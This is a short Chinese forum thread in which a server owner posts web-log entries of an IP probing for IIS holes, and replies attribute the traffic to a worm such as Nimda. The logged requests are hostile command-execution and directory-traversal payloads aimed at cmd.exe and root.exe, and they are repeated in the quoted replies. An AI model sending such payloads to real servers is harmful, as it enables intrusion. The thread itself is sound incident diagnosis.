k**n 发帖数: 307 | 1 有个IP不停的向我的server发这样的信号:
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等. |
w*****n 发帖数: 94 | 2
Yes, it might be a tool or worm though...
【在 k**n 的大作中提到】 : 有个IP不停的向我的server发这样的信号: : (从httpd log里看见的) : "GET /scripts/root.exe?/c+dir HTTP/1.0" : "GET /MSADC/root.exe?/c+dir HTTP/1.0" : "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
|
p*****r 发帖数: 13 | 3 是,正在寻找IIS Web Server的漏洞
HTTP/1.0"
【在 w*****n 的大作中提到】 : : Yes, it might be a tool or worm though...
|
M******t 发帖数: 309 | 4 that server was infected by Nimda...
【在 k**n 的大作中提到】 : 有个IP不停的向我的server发这样的信号: : (从httpd log里看见的) : "GET /scripts/root.exe?/c+dir HTTP/1.0" : "GET /MSADC/root.exe?/c+dir HTTP/1.0" : "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
|
M******t 发帖数: 309 | 5 看看有没有200啊?
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】 : 有个IP不停的向我的server发这样的信号: : (从httpd log里看见的) : "GET /scripts/root.exe?/c+dir HTTP/1.0" : "GET /MSADC/root.exe?/c+dir HTTP/1.0" : "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
|